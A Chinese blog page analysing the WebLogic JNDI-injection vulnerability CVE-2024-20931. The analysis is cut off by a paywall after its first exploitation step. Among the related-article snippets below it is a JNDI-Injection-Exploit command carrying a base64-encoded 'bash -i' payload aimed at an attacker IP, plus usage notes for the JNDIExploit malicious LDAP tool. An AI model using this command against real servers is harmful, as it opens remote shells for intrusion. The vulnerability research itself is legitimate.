安全研究所 | JNDI注入的一种新攻击面-CVE-2024-20931分析

最新推荐文章于 2025-10-07 21:16:03 发布
原创 最新推荐文章于 2025-10-07 21:16:03 发布 · 1.9k 阅读 · 24 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络 #网络安全

本文详细分析了Oracle Weblogic中CVE-2024-20931漏洞,这是一个基于T3IIOP协议的远程命令执行漏洞,涉及JNDI注入的新攻击面。文章讨论了CVE-2023-21839的漏洞原理和补丁措施,并介绍了新漏洞的挖掘过程,包括ForeignOpaqueReference类的利用步骤和绕过补丁的策略,最终通过AQjmsInitialContextFactory实现二次JNDI注入,完成远程RCE。

在Oracle官方最新发布的January 2024补丁中,修复了一个基于Weblogic T3\IIOP协议的远程命令执行漏洞CVE-2024-20931,该漏洞由亿格云安全研究员Glassy在2023年10月提交给Oracle,从原理上属于CVE-2023-21839补丁的绕过,其中涉及到一个JNDI的新攻击面,在这里分享出来。

漏洞分析

01

CVE-2023-21839概述

当Weblogic通过T3\IIOP进行绑定的远程对象实现了OpaqueReference接口,那么在对该对象进行lookup时,会调用这个对象的getReferent函数进行查询。

图片

而碰巧有一个名为ForeignOpaqueReference的对象,它的getReferent函数在进行远程对象查询的时候,会再次发起JNDI查询,从而造成了JNDI注入。

图片

利用步骤大致分为三步

(关键步骤均用红框进行了标记)

Step1

建立一个恶意ForeignOpaqueReference对象,并将remot

最低0.47元/天 解锁文章
WebLogic Server JNDI注入漏洞复现(CVE-2024-20931)
0xSec
02-23 2682
在Oracle发布的2024年1月补丁中,成功修复了一个基于Weblogic T3\IIOP协议的远程命令执行漏洞CVE-2024-20931,该漏洞是由于 CVE-2023-21839 漏洞未修补完全,未经身份验证的攻击者通过 T3、IIOP进行网络访问来破坏 Oracle WebLogic Server。成功利用此漏洞可能会导致 Oracle WebLogic Server 被接管。
CVE-2024-20931 Oracle 一个基于Weblogic T3\IIOP协议的远程命令执行漏洞
qq_63278311的博客
02-06 2688
此漏洞在2023年10月向Oracle报告的,本质上是CVE-2023-21839补丁的一种绕过,牵涉到一个JNDI攻击面。设置了ForeignOpaqueReference的jndiEnvironment属性,其中包含了用于JNDI注入的关键设置,如java.naming.factory.initial和datasource。在WebLogic中存在一个名为ForeignOpaqueReference的对象,其getReferent函数在远程对象查询时再次发起JNDI查询,导致了JNDI注入
JNDI注入和攻击方式
最新发布
没有网络安全就没有国家安全
10-07 1075
JNDI注入和攻击方式
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 4212
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
Goby 漏洞发布|Weblogic ForeignOpaqueReference 远程代码执行漏洞(CVE-2024-20931
m0_46699477的博客
02-22 754
WebLogic Server 是其中的一个适用于云环境和传统环境的应用服务器组件。WebLogic 存在远程代码执行漏洞,该漏洞允许未经身份验证的攻击者通过 IIOP 协议网络访问并破坏易受攻击的 WebLogic Server,成功的漏洞利用可导致 WebLogic Server 被攻击者接管,从而造成远程代码执行。
安全研究所 - JNDI注入一种攻击面-CVE-2024-20931分析
A_991128a的博客
04-20 852
当Weblogic通过T3\IIOP进行绑定的远程对象实现了OpaqueReference接口,那么在对该对象进行lookup时,会调用这个对象的getReferent函数进行查询。![图片](https://img-而碰巧有一个名为ForeignOpaqueReference的对象,它的getReferent函数在进行远程对象查询的时候,会再次发起JNDI查询,从而造成了JNDI注入。![图片](https://img-
Weblogic12c T3 协议安全漏洞分析CVE-2020-14645 && CVE-2020-2883 && CVE-2020-14645】
weixin_45694388的博客
10-02 2398
前言 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件。 主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 近几年频繁爆发出多个RCE漏洞,而在今年,其T3协议被频繁攻击和发布补丁与绕过,本文主要对今年来由T3协议入口所产生的多个RCE漏洞进行分析,其中主要包括CVE-2020-2555、 CVE-2020-2883(bypass CVE-2020-2555补丁)、 CVE-2020
漏洞威胁分析报告(上册)- 不同视角下的漏洞威胁
further_eye的博客
03-09 2319
前言 刚刚过去的2020年以极具戏剧性的开场和魔幻现实主义的中章,给传统行业当头一棒,疫情的延伸早已超出了绝大部分人的预料。传统行业被迫转型;企业被迫选择线上办公;学校被迫开设网课。在经济体系运作如此困难的情况下,互联网行业在整个市场却占据更稳定的位置,互联网行业飞速发展的同时也带来了前所未有的网络安全挑战。 热爱网络安全的年轻人们,经历了停工、停学,却从未停下漏洞研究的脚步,据统计,2020年增20086条漏洞信息(来源于cnvd),相较于2019年,漏洞环比增长125.1%。 产品...
cve-2021-44228漏洞复现分析
03-03
### CVE-2021-44228 漏洞复现分析 #### Log4j 的介绍 Log4j 是一个广泛使用的Java日志记录库,由Apache软件基金会开发。该库允许开发者通过配置文件灵活控制日志信息的格式、级别以及输出位置。 #### 漏洞概述 CVE...
log4j-api-2.17.0中文英文对照文档及开发资源
Log4j 曾因 CVE-2021-44228(俗称 Log4Shell)漏洞引发全球范围的安全危机,而 2.17.0 正是在此背景下紧急发布的修复版本之一,增强了对 JNDI 注入攻击的防护能力。因此,推荐使用此版本不仅是为了获得良好文档支持...
安全攻击原理详解(四) -- JNDI
saodiseng_a的博客
12-23 3595
1. JNDI 1.1 JNDI基本概念 JNDI(Java Naming and DIrecroty Interface),是java命名与目录接口,JNDI包括Naming Service和Directory Service,通过名称来寻找数据和对象的API,也称为一种绑定。JNDI可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA。 //web.xml <Environment name="jndiName" value="jndiValue" type=
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
JNDI漏洞利用 一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用java -jar JNDIExploit.jar -h查看参数说明,其中--ip参数为必选参数 Usage: java -jar JNDIExploit.jar [options] Options: * -i, --ip Local ip address -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8080) -u, --usage Show usage (default: false)
Weblogic Server JNDI命令执行漏洞复现,一线互联网架构师筑基必备技能之网络安全
2401_84184638的博客
04-10 1112
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Weblogic Server JNDI命令执行漏洞复现
xxxtentaction24的博客
03-04 590
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,此处填写加密的东西} | {base64,-d} | {bash, -i }" -A "攻击机ip"注:在同一个机子上面运行攻击机需要的软件。第三个填写JNDI的恶意构造的内容。第六步:将恶意的服务地址填入工具中。需要填入恶意地址为箭头所指的地方。第三步:利用工具进行exp利用。第一步:安装存在漏洞的镜像。②处填入你需要监听的端口号。①处填入攻击机的ip。
JNDI注入一种攻击面-CVE-2024-20931分析
A1_3_9_7的博客
03-22 784
当Weblogic通过T3\IIOP进行绑定的远程对象实现了OpaqueReference接口,那么在对该对象进行lookup时,会调用这个对象的getReferent函数进行查询。而碰巧有一个名为ForeignOpaqueReference的对象,它的getReferent函数在进行远程对象查询的时候,会再次发起JNDI查询,从而造成了JNDI注入
JNDI以及利用JNDI进行漏洞攻击
qq_23947467的博客
01-30 694
JNDI是java提供的命名和目录服务。 命名服务 命名服务是一种简单的键值对绑定,可以通过键名检索值,RMI就是典型的命名服务 目录服务 目录服务是命名服务的拓展。它与命名服务的区别在于它可以通过对象属性来检索对象,这么说可能不太好理解,我们举个例子:比如你要在某个学校里里找某个人,那么会通过:年级->班级->姓名这种方式来查找,年级、班级、姓名这些就是某个人的属性,这种层级关系就很像目录关系。
JNDI注入详解
m0_60571990的博客
03-02 5103
JNDI注入详解
Atlassian 发布20多个漏洞,含严重的 Bamboo 漏洞
smellycat000的专栏
03-21 725
聚焦源代码安全,网罗国内外最资讯!编译:代码卫士Atlassian 公司修复20多个漏洞,其中严重的 Bamboo Data Center and Server 漏洞可在无需用户交互的情况下遭利用。该漏洞的编号是CVE-2024-1597,CVSS评分为10分。该漏洞是SQL注入漏洞,位于依赖 org.postgresql:postgresql中,但Atlassian公司表示它“展示了较低的评...
深入理解JNDI注入—RMI/LDAP攻击
本散修的一些学习心得与笔记,道友请自便。
09-18 2508
透过真实漏洞来真正深入理解JNDI注入以及如何通过两种协议配合(RMI/LDAP)进行攻击。
揭示rogue-jndiJNDI注入攻击与恶意LDAP服务器
由于Java的早期版本中存在JNDI使用上的安全漏洞,rogue-jndi成为了一种有效的攻击手段。在攻击执行过程中,攻击者需要触发JNDI解析,例如通过以下Java代码片段: ```java InitialContext ctx = new InitialContext()...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值